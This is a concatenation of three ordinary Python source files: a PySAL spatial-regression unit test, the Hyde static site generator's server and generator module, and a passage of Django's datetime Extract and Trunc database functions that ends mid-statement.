        np.testing.assert_array_almost_equal(reg.yend[0], yend, 6)
        z = np.array([1., 19.531, 15.72598, 35.4585005])
        np.testing.assert_array_almost_equal(reg.z.toarray()[0], z, 6)
        my = 38.43622446938776
        self.assertAlmostEqual(reg.mean_y, my)
        sy = 18.466069465206047
        self.assertAlmostEqual(reg.std_y, sy)
        vm = np.array([[5.22438894e+02, -6.07257246e+00, -1.91428892e+00, -8.97134337e+00],
                       [-6.07257246e+00, 2.38012836e-01, 4.70160750e-02, 2.80964005e-02],
                       [-1.91428911e+00, 4.70160773e-02, 3.20924154e-02, 3.14968682e-03],
                       [-8.97134237e+00, 2.80964005e-02, 3.14968682e-03, 2.15753890e-01]])
        np.testing.assert_array_almost_equal(reg.vm, vm, 4)
        sig2 = 181.78650186468832
        self.assertAlmostEqual(reg.sig2, sig2, 4)
class TestGMCombo(unittest.TestCase):
    """Regression test for the user-facing error_sp.GM_Combo wrapper."""

    def setUp(self):
        # The wrapper builds constant and lag instruments itself, so X is
        # just [INC, CRIME] as a sparse CSR matrix.
        db = pysal.open(pysal.examples.get_path("columbus.dbf"), "r")
        y = np.array(db.by_col("HOVAL"))
        self.y = np.reshape(y, (49, 1))
        X = []
        X.append(db.by_col("INC"))
        X.append(db.by_col("CRIME"))
        self.X = np.array(X).T
        self.X = sparse.csr_matrix(self.X)
        self.w = pysal.rook_from_shapefile(pysal.examples.get_path("columbus.shp"))
        self.w.transform = 'r'

    def test_model(self):
        # Only spatial lag
        reg = SP.GM_Combo(self.y, self.X, w=self.w)
        e_reduced = np.array([28.18617481])
        np.testing.assert_array_almost_equal(reg.e_pred[0], e_reduced, 6)
        predy_e = np.array([52.28082782])
        np.testing.assert_array_almost_equal(reg.predy_e[0], predy_e, 6)
        betas = np.array([[57.61123515], [0.73441313], [-0.59459416], [-0.21762921], [0.54732051]])
        np.testing.assert_array_almost_equal(reg.betas, betas, 6)
        u = np.array([25.57932637])
        np.testing.assert_array_almost_equal(reg.u[0], u, 6)
        e_filtered = np.array([31.65374945])
        np.testing.assert_array_almost_equal(reg.e_filtered[0], e_filtered, 5)
        predy = np.array([54.88767685])
        np.testing.assert_array_almost_equal(reg.predy[0], predy, 6)
        n = 49
        self.assertAlmostEqual(reg.n, n)
        k = 4
        self.assertAlmostEqual(reg.k, k)
        y = np.array([80.467003])
        np.testing.assert_array_almost_equal(reg.y[0], y, 6)
        x = np.array([1., 19.531, 15.72598])
        np.testing.assert_array_almost_equal(reg.x.toarray()[0], x, 6)
        yend = np.array([35.4585005])
        np.testing.assert_array_almost_equal(reg.yend[0], yend, 6)
        z = np.array([1., 19.531, 15.72598, 35.4585005])
        np.testing.assert_array_almost_equal(reg.z.toarray()[0], z, 6)
        my = 38.43622446938776
        self.assertAlmostEqual(reg.mean_y, my)
        sy = 18.466069465206047
        self.assertAlmostEqual(reg.std_y, sy)
        vm = np.array([[5.22438894e+02, -6.07257246e+00, -1.91428892e+00, -8.97134337e+00],
                       [-6.07257218e+00, 2.38012839e-01, 4.70160773e-02, 2.80964005e-02],
                       [-1.91428911e+00, 4.70160773e-02, 3.20924154e-02, 3.14968682e-03],
                       [-8.97134237e+00, 2.80964005e-02, 3.14968682e-03, 2.15753890e-01]])
        np.testing.assert_array_almost_equal(reg.vm, vm, 4)
        sig2 = 181.78650186468832
        self.assertAlmostEqual(reg.sig2, sig2, 4)
        # Inference diagnostics only exposed on the user-facing class.
        pr2 = 0.3018280166937799
        self.assertAlmostEqual(reg.pr2, pr2)
        pr2_e = 0.3561355587000738
        self.assertAlmostEqual(reg.pr2_e, pr2_e)
        std_err = np.array([22.85692222, 0.48786559, 0.17914356, 0.46449318])
        np.testing.assert_array_almost_equal(reg.std_err, std_err, 5)
        z_stat = np.array([[2.52051597e+00, 1.17182922e-02],
                           [1.50535954e+00, 1.32231664e-01],
                           [-3.31909311e+00, 9.03103123e-04],
                           [-4.68530506e-01, 6.39405261e-01]])
        np.testing.assert_array_almost_equal(reg.z_stat, z_stat, 6)
if __name__ == '__main__':
    # unittest.main() raises SystemExit when the run finishes, so the
    # original trailing restore of the numpy print options was dead code.
    # A try/finally guarantees the restore runs even as the process exits.
    start_suppress = np.get_printoptions()['suppress']
    np.set_printoptions(suppress=True)
    try:
        unittest.main()
    finally:
        np.set_printoptions(suppress=start_suppress)
| |
"""
Entry Points for Hyde Engine
"""
import imp
import mimetypes
import os
import sys
import subprocess
import urllib
from collections import defaultdict
from Queue import Queue, Empty
from threading import Thread, Event
from django.conf import settings
from django.template import add_to_builtins
from file_system import File, Folder
from path_util import PathUtil
from processor import Processor
from siteinfo import SiteInfo
from url import clean_url
class _HydeDefaults:
    """
    Fallback values for a hyde site's Django settings; passed to
    settings.configure() in setup_env() so any setting the site's
    settings.py omits falls back to these.
    """

    GENERATE_CLEAN_URLS = False        # extension-less urls disabled by default
    GENERATE_ABSOLUTE_FS_URLS = False  # mutually exclusive with clean urls (see validate_settings)
    LISTING_PAGE_NAMES = ['index', 'default', 'listing']  # filenames treated as folder listings
    APPEND_SLASH = False
    MEDIA_PROCESSORS = {}
    CONTENT_PROCESSORS = {}
    SITE_PRE_PROCESSORS = {}
    SITE_POST_PROCESSORS = {}
    CONTEXT = {}                       # presence of CONTEXT marks the env as configured
    RST_SETTINGS_OVERRIDES = {}
def setup_env(site_path):
    """
    Initializes the Django Environment. NOOP if the environment is
    initialized already.

    Loads <site_path>/settings.py, layers it over Django's global defaults
    and configures django.conf.settings with _HydeDefaults as fallbacks.
    Raises ValueError when the path is not a hyde site or its settings are
    invalid.
    """
    # Don't do it twice: CONTEXT is only present once configure() has run.
    if hasattr(settings, "CONTEXT"):
        return

    settings_file = os.path.join(site_path, "settings.py")
    if not os.path.exists(settings_file):
        print "No Site Settings File Found"
        raise ValueError("The given site_path [%s] does not contain a hyde site. "
                         "Give a valid path or run -init to create a new site." % (site_path,))
    try:
        # Load the site's settings.py as a standalone module.
        hyde_site_settings = imp.load_source("hyde_site_settings",
                                             os.path.join(site_path, "settings.py"))
    except SyntaxError, err:
        print "The given site_path [%s] contains a settings file " \
              "that could not be loaded due syntax errors." % site_path
        print err
        exit()
    except Exception, err:
        print "Failed to import Site Settings"
        print "The settings file [%s] contains errors." % (settings_file,)
        raise

    try:
        # Layering: django global defaults <- site settings, with
        # _HydeDefaults supplying hyde-specific fallbacks in configure().
        from django.conf import global_settings
        defaults = global_settings.__dict__
        defaults.update(hyde_site_settings.__dict__)
        settings.configure(_HydeDefaults, **defaults)
    except Exception, err:
        print "Site settings are not defined properly"
        print err
        raise ValueError(
            "The given site_path [%s] has invalid settings. "
            "Give a valid path or run -init to create a new site."
            % site_path
        )
def validate_settings():
    """
    Ensures the site settings are properly configured.

    The two URL-generation modes are mutually exclusive; refuse to
    continue when both are switched on.
    """
    clean_urls = settings.GENERATE_CLEAN_URLS
    absolute_urls = settings.GENERATE_ABSOLUTE_FS_URLS
    if clean_urls and absolute_urls:
        raise ValueError(
            "GENERATE_CLEAN_URLS and GENERATE_ABSOLUTE_FS_URLS cannot "
            "be enabled at the same time."
        )
class Server(object):
    """
    Initializes and runs a cherrypy webserver serving static files from the deploy
    folder
    """

    def __init__(self, site_path, address='localhost', port=8080):
        # site_path: path to the hyde site (user/env vars expanded, made absolute).
        # address/port: bind address for the cherrypy socket.
        super(Server, self).__init__()
        self.site_path = os.path.abspath(os.path.expandvars(
                            os.path.expanduser(site_path)))
        self.address = address
        self.port = port

    def serve(self, deploy_path, exit_listner):
        """
        Starts the cherrypy server at the given `deploy_path`. If exit_listner is
        provided, calls it when the engine exits.
        """
        # NOTE(review): 'exit_listner' is a typo for 'exit_listener'; kept
        # as-is since callers may pass it by this keyword.
        try:
            import cherrypy
            from cherrypy.lib.static import serve_file
        except ImportError:
            print "Cherry Py is required to run the webserver"
            raise

        setup_env(self.site_path)
        validate_settings()
        # (a, b)[not deploy_path] selects settings.DEPLOY_DIR when
        # deploy_path is falsy, otherwise deploy_path itself.
        deploy_folder = Folder(
                        (deploy_path, settings.DEPLOY_DIR)
                        [not deploy_path])

        if not 'site' in settings.CONTEXT:
            generator = Generator(self.site_path)
            generator.create_siteinfo()

        site = settings.CONTEXT['site']
        # defaultdict(bool): missing urls look up as False (also inserts
        # a False entry per miss — see the TODO in default() below).
        url_file_mapping = defaultdict(bool)

        # This following bit is for supporting listing pages with arbitrary
        # filenames.
        if settings.GENERATE_CLEAN_URLS:
            for page in site.walk_pages():  # build url to file mapping
                if page.listing and page.file.name_without_extension not in \
                        (settings.LISTING_PAGE_NAMES + [page.node.name]):
                    filename = page.target_file.path
                    url = page.url.strip('/')
                    url_file_mapping[url] = filename

        class WebRoot:
            @cherrypy.expose
            def index(self):
                page = site.listing_page
                return serve_file(deploy_folder.child(page.name))

            # default() is only defined when clean urls are enabled; this
            # `if` runs at class-body time.
            if settings.GENERATE_CLEAN_URLS:
                @cherrypy.expose
                def default(self, *args):
                    # TODO notice that this method has security flaws
                    # TODO for every url_file_mapping not found, we will
                    # save that in url_file_mapping. not optimal.

                    # first, see if the url is in the url_file_mapping
                    # dictionary
                    file = url_file_mapping[os.sep.join(args)]
                    if file:
                        return serve_file(file)
                    # next, try to find a listing page whose filename is the
                    # same as its enclosing folder's name
                    file = os.path.join(deploy_folder.path, os.sep.join(args),
                                        args[-1] + '.html')
                    if os.path.isfile(file):
                        return serve_file(file)
                    # try each filename in LISTING_PAGE_NAMES setting
                    for listing_name in settings.LISTING_PAGE_NAMES:
                        file = os.path.join(deploy_folder.path,
                                            os.sep.join(args),
                                            listing_name + '.html')
                        if os.path.isfile(file):
                            return serve_file(file)
                    # failing that, search for a non-listing page
                    file = os.path.join(deploy_folder.path,
                                        os.sep.join(args[:-1]),
                                        args[-1] + '.html')
                    if os.path.isfile(file):
                        return serve_file(file)
                    # failing that, page not found
                    raise cherrypy.NotFound

        cherrypy.config.update({'environment': 'production',
                                'log.error_file': 'site.log',
                                'log.screen': True,
                                'server.socket_host': self.address,
                                'server.socket_port': self.port,
                                })

        # even if we're still using clean urls, we still need to serve media.
        if settings.GENERATE_CLEAN_URLS:
            media_web_path = '/%s/media' % settings.SITE_ROOT.strip('/')
            # if SITE_ROOT is /, we end up with //media
            media_web_path = media_web_path.replace('//', '/')
            conf = {media_web_path: {
                'tools.staticdir.dir': os.path.join(deploy_folder.path,
                                                    settings.SITE_ROOT.strip('/'),
                                                    'media'),
                'tools.staticdir.on': True
            }}
        else:
            conf = {'/': {
                'tools.staticdir.dir': deploy_folder.path,
                'tools.staticdir.on': True
            }}
        cherrypy.tree.mount(WebRoot(), settings.SITE_ROOT, conf)
        if exit_listner:
            cherrypy.engine.subscribe('exit', exit_listner)
        cherrypy.engine.start()

    @property
    def alive(self):
        """
        Checks if the webserver is alive.
        """
        import cherrypy
        return cherrypy.engine.state == cherrypy.engine.states.STARTED

    def block(self):
        """
        Blocks and waits for the engine to exit.
        """
        import cherrypy
        cherrypy.engine.block()

    def quit(self):
        # Stop the cherrypy engine, releasing the listening socket.
        import cherrypy
        cherrypy.engine.exit()
# TODO split into a generic wsgi handler, combine it with the current server
def GeventServer(*args, **kwargs):
    """Factory building a gevent-backed Server subclass and returning an
    instance of it.  The class is defined lazily so gevent is only imported
    when this server type is actually requested.

    NOTE(review): this file is Python 2 only (print statements, the
    ``file()`` builtin, ``urllib.unquote_plus``); gevent.wsgi is also the
    legacy module name (later renamed gevent.pywsgi).
    """
    import gevent.greenlet
    import gevent.wsgi
    class GeventServerWrapper(Server):
        # Seconds to wait for in-flight requests when stopping.
        STOP_TIMEOUT = 10
        # Bytes per read when streaming a file response.
        CHUNK_SIZE = 4096
        # Used when mimetypes cannot guess a content type.
        FALLBACK_CONTENT_TYPE = 'application/octet-stream'
        def __init__(self, *args, **kwargs):
            super(GeventServerWrapper, self).__init__(*args, **kwargs)
            addr = (self.address, self.port)
            self.server = gevent.wsgi.WSGIServer(addr, self.request_handler)
            # Maps clean URLs (stripped of '/') to absolute file paths.
            self.paths = {}
            self.root = None
            # FIXME
            mimetypes.init()
        def serve(self, deploy_path, exit_listener):
            """Index the deployed files by URL and start the WSGI server.

            NOTE(review): exit_listener is accepted but never used here.
            """
            setup_env(self.site_path)
            validate_settings()
            self.root = deploy_path or settings.DEPLOY_DIR
            if not 'site' in settings.CONTEXT:
                generator = Generator(self.site_path)
                generator.create_siteinfo()
            def add_url(url, path, listing):
                # Register one URL -> file mapping, normalising clean URLs
                # and collapsing listing pages onto their directory URL.
                # TODO fix this ugly url hack
                if settings.GENERATE_CLEAN_URLS and '.' in url:
                    url = clean_url(url)
                # strip names from listing pages
                head, tail = os.path.split(url)
                parent = os.path.basename(head)
                name = os.path.splitext(tail)[0]
                if listing and (name == parent or
                                name in settings.LISTING_PAGE_NAMES):
                    url = os.path.dirname(url)
                self.paths.setdefault(url, path)
            # gather all urls (only works if you generate it)
            """
            site = settings.CONTEXT['site']
            for page in site.walk_pages():
                url = page.url.strip('/')
                add_url(url, page.target_file.path, page.listing)
            """
            # register all other static files
            # FIXME we just register all files, we should do this properly
            # FIXME we're relying on os.sep is /, fine for now
            for dirpath, dirnames, filenames in os.walk(self.root):
                path = dirpath[len(self.root)+1:]
                for filename in filenames:
                    url = os.path.join(path, filename)
                    # do we know if it's listing or not?
                    add_url(url, os.path.join(dirpath, filename), listing=True)
            import pprint
            #print 'I currently serve: \n', pprint.pformat(sorted(self.paths.items()))
            self.server.start()
            print 'Started %s on %s:%s' % (self.server.base_env['SERVER_SOFTWARE'],
                                           self.server.server_host,
                                           self.server.server_port)
        def block(self):
            """Wait for the server to stop, then make sure it really stops."""
            # XXX is there a nicer way of doing this?
            try:
                self.server._stopped_event.wait()
            finally:
                gevent.greenlet.Greenlet.spawn(self.server.stop,
                                               timeout=self.STOP_TIMEOUT).join()
        def quit(self):
            self.server.stop(timeout=self.STOP_TIMEOUT)
        def request_handler(self, env, start_response):
            """WSGI handler: look the URL up in self.paths and stream the
            file back in CHUNK_SIZE pieces, or answer 404.
            """
            # extract the real requested file
            path = os.path.abspath(urllib.unquote_plus(env['PATH_INFO']))
            # check if file exists
            filename = self.paths.get(path.strip('/'))
            if not filename or not os.path.exists(filename):
                start_response('404 Not Found', [('Content-Type', 'text/plain')])
                yield 'Not Found\n'
                return
            # TODO how do we easiest detect mime types?
            content_type, encoding = mimetypes.guess_type(filename)
            if not content_type:
                content_type = self.FALLBACK_CONTENT_TYPE
            start_response('200 OK', [('Content-Type', content_type)])
            # TODO make this async?
            # NOTE(review): file() is the Python 2 builtin; open() under py3.
            f = file(filename, 'rb')
            try:
                chunk = f.read(self.CHUNK_SIZE)
                while chunk:
                    yield chunk
                    chunk = f.read(self.CHUNK_SIZE)
            finally:
                f.close()
    return GeventServerWrapper(*args, **kwargs)
class Generator(object):
    """
    Generates a deployable website from the templates. Can monitor the site
    for changes and regenerate incrementally on background threads (a watcher
    that drains the change queue and a regenerator that debounces rebuilds).
    """
    def __init__(self, site_path):
        super(Generator, self).__init__()
        # Fully resolve the site path (user home and env vars expanded).
        self.site_path = os.path.abspath(os.path.expandvars(
                            os.path.expanduser(site_path)))
        # Events coordinating the watcher and regenerator threads.
        self.regenerate_request = Event()
        self.regeneration_complete = Event()
        self.queue = Queue()
        self.watcher = Thread(target=self.__watch__)
        self.regenerator = Thread(target=self.__regenerate__)
        self.processor = Processor(settings)
        self.quitting = False
    def notify(self, title, message):
        # Best-effort desktop notification via Growl or a generic notifier
        # command; all failures are deliberately swallowed.
        if hasattr(settings, "GROWL") and settings.GROWL and File(settings.GROWL).exists:
            try:
                subprocess.call([settings.GROWL, "-n", "Hyde", "-t", title, "-m", message])
            except:
                pass
        elif hasattr(settings, "NOTIFY") and settings.NOTIFY and File(settings.NOTIFY).exists:
            try:
                subprocess.call([settings.NOTIFY, "Hyde: " + title, message])
            except:
                pass
    def pre_process(self, node):
        self.processor.pre_process(node)
    def process(self, item, change="Added"):
        # Dispatch a single resource change to the processor; additions and
        # modifications regenerate, deletions remove the output.
        if change in ("Added", "Modified"):
            settings.CONTEXT['node'] = item.node
            settings.CONTEXT['resource'] = item
            return self.processor.process(item)
        elif change in ("Deleted", "NodeRemoved"):
            return self.processor.remove(item)
    def build_siteinfo(self, deploy_path=None):
        """Prepare the tmp/deploy folders and build the site info tree."""
        tmp_folder = Folder(settings.TMP_DIR)
        # Tuple-indexing trick: use deploy_path when given, otherwise fall
        # back to settings.DEPLOY_DIR.
        deploy_folder = Folder(
                    (deploy_path, settings.DEPLOY_DIR)
                    [not deploy_path])
        if deploy_folder.exists and settings.BACKUP:
            backup_folder = Folder(settings.BACKUPS_DIR).make()
            deploy_folder.backup(backup_folder)
        tmp_folder.delete()
        tmp_folder.make()
        settings.DEPLOY_DIR = deploy_folder.path
        if not deploy_folder.exists:
            deploy_folder.make()
        # Make hyde's template tags available without explicit {% load %}.
        add_to_builtins('hydeengine.templatetags.hydetags')
        add_to_builtins('hydeengine.templatetags.aym')
        add_to_builtins('hydeengine.templatetags.typogrify')
        self.create_siteinfo()
    def create_siteinfo(self):
        self.siteinfo = SiteInfo(settings, self.site_path)
        self.siteinfo.refresh()
        settings.CONTEXT['site'] = self.siteinfo.content_node
    def post_process(self, node):
        self.processor.post_process(node)
    def process_all(self):
        """Run a full generation pass over every resource in the site."""
        self.notify(self.siteinfo.name, "Website Generation Started")
        try:
            self.pre_process(self.siteinfo)
            for resource in self.siteinfo.walk_resources():
                self.process(resource)
            self.complete_generation()
        except Exception, e:
            print >> sys.stderr, "Generation Failed"
            print >> sys.stderr, sys.exc_info()
            self.notify(self.siteinfo.name, "Generation Failed")
            return
        self.notify(self.siteinfo.name, "Generation Complete")
    def complete_generation(self):
        # Post-process, then copy only changed files into the target folder.
        self.post_process(self.siteinfo)
        self.siteinfo.target_folder.copy_contents_of(
            self.siteinfo.temp_folder, incremental=True)
        if(hasattr(settings, "post_deploy")):
            settings.post_deploy()
    def __regenerate__(self):
        """Regenerator thread body: debounce regeneration requests.

        NOTE(review): relies on self.quit_event, which is only created in
        generate() — this thread must not start before generate() runs.
        """
        pending = False
        while True:
            try:
                if self.quit_event.isSet():
                    self.notify(self.siteinfo.name, "Exiting Regenerator")
                    print "Exiting regenerator..."
                    break
                # Wait for the regeneration event to be set
                self.regenerate_request.wait(5)
                # Got a request; we don't want to process it immediately
                # since other changes may be under way. Another request
                # coming in renews the initial one. Only once requests stop
                # arriving do we go ahead and process the pending event.
                if not self.regenerate_request.isSet() and pending:
                    pending = False
                    self.process_all()
                    self.regeneration_complete.set()
                elif self.regenerate_request.isSet():
                    self.regeneration_complete.clear()
                    pending = True
                    self.regenerate_request.clear()
            except:
                print >> sys.stderr, "Error during regeneration"
                print >> sys.stderr, sys.exc_info()
                self.notify(self.siteinfo.name, "Error during regeneration")
                self.regeneration_complete.set()
                self.regenerate_request.clear()
                pending = False
    def __watch__(self):
        """Watcher thread body: drain the change queue and either process a
        single resource or escalate to a full regeneration."""
        regenerating = False
        while True:
            try:
                if self.quit_event.isSet():
                    print "Exiting watcher..."
                    self.notify(self.siteinfo.name, "Exiting Watcher")
                    break
                try:
                    pending = self.queue.get(timeout=10)
                except Empty:
                    continue
                self.queue.task_done()
                # A monitor error is propagated as an 'exception' entry.
                if pending.setdefault("exception", False):
                    self.quit_event.set()
                    print "Exiting watcher"
                    self.notify(self.siteinfo.name, "Exiting Watcher")
                    break
                if 'resource' in pending:
                    resource = pending['resource']
                if self.regeneration_complete.isSet():
                    regenerating = False
                if pending['change'] == "Deleted":
                    self.process(resource, pending['change'])
                elif pending['change'] == "NodeRemoved":
                    self.process(pending['node'], pending['change'])
                # Deletions, layout changes, or an in-flight regeneration all
                # force a full rebuild instead of a single-resource update.
                if (pending['change'] in ("Deleted", "NodeRemoved") or
                    resource.is_layout or regenerating):
                    regenerating = True
                    self.regenerate_request.set()
                    continue
                self.notify(self.siteinfo.name, "Processing " + resource.name)
                if self.process(resource, pending['change']):
                    self.complete_generation()
                self.notify(self.siteinfo.name, "Completed processing " + resource.name)
            except:
                print >> sys.stderr, "Error during regeneration"
                print >> sys.stderr, sys.exc_info()
                self.notify(self.siteinfo.name, "Error during regeneration")
                self.regeneration_complete.set()
                self.regenerate_request.clear()
                regenerating = False
    def generate(self, deploy_path=None,
                    keep_watching=False,
                    exit_listner=None):
        """Run one full generation; optionally keep watching for changes.

        NOTE(review): 'exit_listner' (sic) is the public parameter name.
        """
        self.exit_listner = exit_listner
        self.quit_event = Event()
        setup_env(self.site_path)
        validate_settings()
        self.build_siteinfo(deploy_path)
        self.process_all()
        self.siteinfo.temp_folder.delete()
        if keep_watching:
            try:
                self.siteinfo.temp_folder.make()
                self.watcher.start()
                self.regenerator.start()
                self.siteinfo.monitor(self.queue)
            except (KeyboardInterrupt, IOError, SystemExit):
                self.quit()
            except:
                self.quit()
                raise
    def block(self):
        """Join the watcher/regenerator threads until they exit."""
        try:
            while self.watcher.isAlive():
                self.watcher.join(0.1)
            while self.regenerator.isAlive():
                self.regenerator.join(0.1)
            self.siteinfo.dont_monitor()
        except (KeyboardInterrupt, IOError, SystemExit):
            self.quit()
        except:
            self.quit()
            raise
    def quit(self):
        """Idempotent shutdown: stop monitoring, signal threads, notify."""
        if self.quitting:
            return
        self.quitting = True
        print "Shutting down..."
        self.notify(self.siteinfo.name, "Shutting Down")
        self.siteinfo.dont_monitor()
        self.quit_event.set()
        if self.exit_listner:
            self.exit_listner()
class Initializer(object):
    """Create a new Hyde site directory from a bundled template."""
    def __init__(self, site_path):
        super(Initializer, self).__init__()
        self.site_path = Folder(site_path)
    def initialize(self, root, template=None, force=False):
        """Copy ``<root>/templates/<template>`` into ``self.site_path``.

        Args:
            root: Directory containing the ``templates`` folder.
            template: Template name; defaults to "default".
            force: When True, wipe a non-empty target before copying.

        Raises:
            ValueError: if the template is missing, or the target directory
                is non-empty (ignoring hidden files) and ``force`` is False.
        """
        if not template:
            template = "default"
        root_folder = Folder(root)
        template_dir = root_folder.child_folder("templates", template)
        if not template_dir.exists:
            raise ValueError(
                "Cannot find the specified template[%s]." % template_dir)
        if self.site_path.exists:
            files = os.listdir(self.site_path.path)
            PathUtil.filter_hidden_inplace(files)
            # Idiom fix: test the list's truthiness, not len(files).
            if files and not force:
                raise ValueError(
                    "The site_path[%s] is not empty." % self.site_path)
            elif force:
                self.site_path.delete()
        self.site_path.make()
        self.site_path.copy_contents_of(template_dir)
| |
from datetime import datetime
from django.conf import settings
from django.db.models import (
DateField, DateTimeField, DurationField, Field, Func, IntegerField,
TimeField, Transform, fields,
)
from django.db.models.lookups import (
YearExact, YearGt, YearGte, YearLt, YearLte,
)
from django.utils import timezone
class TimezoneMixin:
    """Mixin resolving the timezone name used for datetime SQL conversion."""
    # Optional explicit tzinfo; None means "use the current timezone".
    tzinfo = None
    def get_tzname(self):
        """Return the timezone name to convert with, or None when USE_TZ is off."""
        # Timezone conversions must happen to the input datetime *before*
        # applying a function. 2015-12-31 23:00:00 -02:00 is stored in the
        # database as 2016-01-01 01:00:00 +00:00. Any results should be
        # based on the input datetime not the stored datetime.
        tzname = None
        if settings.USE_TZ:
            if self.tzinfo is None:
                tzname = timezone.get_current_timezone_name()
            else:
                tzname = timezone._get_timezone_name(self.tzinfo)
        return tzname
class Extract(TimezoneMixin, Transform):
    """Extract a single named component (year, month, hour, ...) from a
    date/time expression; the result is always an IntegerField.
    """
    lookup_name = None
    output_field = IntegerField()
    def __init__(self, expression, lookup_name=None, tzinfo=None, **extra):
        # lookup_name may come from the subclass attribute or the caller.
        if self.lookup_name is None:
            self.lookup_name = lookup_name
        if self.lookup_name is None:
            raise ValueError('lookup_name must be provided')
        self.tzinfo = tzinfo
        super().__init__(expression, **extra)
    def as_sql(self, compiler, connection):
        # Dispatch to the backend's extract SQL based on the lhs field type.
        sql, params = compiler.compile(self.lhs)
        lhs_output_field = self.lhs.output_field
        if isinstance(lhs_output_field, DateTimeField):
            # Datetimes are converted to the active/explicit timezone first.
            tzname = self.get_tzname()
            sql = connection.ops.datetime_extract_sql(self.lookup_name, sql, tzname)
        elif isinstance(lhs_output_field, DateField):
            sql = connection.ops.date_extract_sql(self.lookup_name, sql)
        elif isinstance(lhs_output_field, TimeField):
            sql = connection.ops.time_extract_sql(self.lookup_name, sql)
        elif isinstance(lhs_output_field, DurationField):
            if not connection.features.has_native_duration_field:
                raise ValueError('Extract requires native DurationField database support.')
            sql = connection.ops.time_extract_sql(self.lookup_name, sql)
        else:
            # resolve_expression has already validated the output_field so this
            # assert should never be hit.
            assert False, "Tried to Extract from an invalid type."
        return sql, params
    def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
        copy = super().resolve_expression(query, allow_joins, reuse, summarize, for_save)
        field = copy.lhs.output_field
        if not isinstance(field, (DateField, DateTimeField, TimeField, DurationField)):
            raise ValueError(
                'Extract input expression must be DateField, DateTimeField, '
                'TimeField, or DurationField.'
            )
        # Passing dates to functions expecting datetimes is most likely a mistake.
        if type(field) == DateField and copy.lookup_name in ('hour', 'minute', 'second'):
            raise ValueError(
                "Cannot extract time component '%s' from DateField '%s'. " % (copy.lookup_name, field.name)
            )
        return copy
class ExtractYear(Extract):
    """Extract the calendar year."""
    lookup_name = 'year'
class ExtractIsoYear(Extract):
    """Return the ISO-8601 week-numbering year."""
    lookup_name = 'iso_year'
class ExtractMonth(Extract):
    """Extract the month (1-12)."""
    lookup_name = 'month'
class ExtractDay(Extract):
    """Extract the day of the month (1-31)."""
    lookup_name = 'day'
class ExtractWeek(Extract):
    """
    Return 1-52 or 53, based on ISO-8601, i.e., Monday is the first day of
    the week.
    """
    lookup_name = 'week'
class ExtractWeekDay(Extract):
    """
    Return Sunday=1 through Saturday=7.

    To replicate this in Python: (mydatetime.isoweekday() % 7) + 1
    """
    lookup_name = 'week_day'
class ExtractQuarter(Extract):
    """Extract the quarter of the year (1-4)."""
    lookup_name = 'quarter'
class ExtractHour(Extract):
    """Extract the hour (0-23)."""
    lookup_name = 'hour'
class ExtractMinute(Extract):
    """Extract the minute (0-59)."""
    lookup_name = 'minute'
class ExtractSecond(Extract):
    """Extract the second (0-59)."""
    lookup_name = 'second'
# Register the Extract transforms on the field types they apply to.
DateField.register_lookup(ExtractYear)
DateField.register_lookup(ExtractMonth)
DateField.register_lookup(ExtractDay)
DateField.register_lookup(ExtractWeekDay)
DateField.register_lookup(ExtractWeek)
DateField.register_lookup(ExtractIsoYear)
DateField.register_lookup(ExtractQuarter)
TimeField.register_lookup(ExtractHour)
TimeField.register_lookup(ExtractMinute)
TimeField.register_lookup(ExtractSecond)
DateTimeField.register_lookup(ExtractHour)
DateTimeField.register_lookup(ExtractMinute)
DateTimeField.register_lookup(ExtractSecond)
# Enable optimized year comparison lookups on the year transforms.
ExtractYear.register_lookup(YearExact)
ExtractYear.register_lookup(YearGt)
ExtractYear.register_lookup(YearGte)
ExtractYear.register_lookup(YearLt)
ExtractYear.register_lookup(YearLte)
ExtractIsoYear.register_lookup(YearExact)
ExtractIsoYear.register_lookup(YearGt)
ExtractIsoYear.register_lookup(YearGte)
ExtractIsoYear.register_lookup(YearLt)
ExtractIsoYear.register_lookup(YearLte)
class Now(Func):
    """Database-evaluated current timestamp (CURRENT_TIMESTAMP)."""
    template = 'CURRENT_TIMESTAMP'
    output_field = fields.DateTimeField()
    def as_postgresql(self, compiler, connection, **extra_context):
        # PostgreSQL's CURRENT_TIMESTAMP means "the time at the start of the
        # transaction". Use STATEMENT_TIMESTAMP to be cross-compatible with
        # other databases.
        return self.as_sql(compiler, connection, template='STATEMENT_TIMESTAMP()', **extra_context)
class TruncBase(TimezoneMixin, Transform):
    """Base for the Trunc* expressions: truncate a date/time expression to a
    given precision (``kind``) on the database side."""
    kind = None
    tzinfo = None
    def __init__(self, expression, output_field=None, tzinfo=None, **extra):
        self.tzinfo = tzinfo
        super().__init__(expression, output_field=output_field, **extra)
    def as_sql(self, compiler, connection):
        # Dispatch to the backend's trunc SQL based on the output field type.
        inner_sql, inner_params = compiler.compile(self.lhs)
        if isinstance(self.output_field, DateTimeField):
            tzname = self.get_tzname()
            sql = connection.ops.datetime_trunc_sql(self.kind, inner_sql, tzname)
        elif isinstance(self.output_field, DateField):
            sql = connection.ops.date_trunc_sql(self.kind, inner_sql)
        elif isinstance(self.output_field, TimeField):
            sql = connection.ops.time_trunc_sql(self.kind, inner_sql)
        else:
            raise ValueError('Trunc only valid on DateField, TimeField, or DateTimeField.')
        return sql, inner_params
    def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
        copy = super().resolve_expression(query, allow_joins, reuse, summarize, for_save)
        field = copy.lhs.output_field
        # DateTimeField is a subclass of DateField so this works for both.
        assert isinstance(field, (DateField, TimeField)), (
            "%r isn't a DateField, TimeField, or DateTimeField." % field.name
        )
        # If self.output_field was None, then accessing the field will trigger
        # the resolver to assign it to self.lhs.output_field.
        if not isinstance(copy.output_field, (DateField, DateTimeField, TimeField)):
            raise ValueError('output_field must be either DateField, TimeField, or DateTimeField')
        # Passing dates or times to functions expecting datetimes is most
        # likely a mistake.
        class_output_field = self.__class__.output_field if isinstance(self.__class__.output_field, Field) else None
        output_field = class_output_field or copy.output_field
        has_explicit_output_field = class_output_field or field.__class__ is not copy.output_field.__class__
        if type(field) == DateField and (
                isinstance(output_field, DateTimeField) or copy.kind in ('hour', 'minute', 'second', 'time')):
            raise ValueError("Cannot truncate DateField '%s' to %s. " % (
                field.name, output_field.__class__.__name__ if has_explicit_output_field else 'DateTimeField'
            ))
        elif isinstance(field, TimeField) and (
                isinstance(output_field, DateTimeField) or
                copy.kind in ('year', 'quarter', 'month', 'week', 'day', 'date')):
            raise ValueError("Cannot truncate TimeField '%s' to %s. " % (
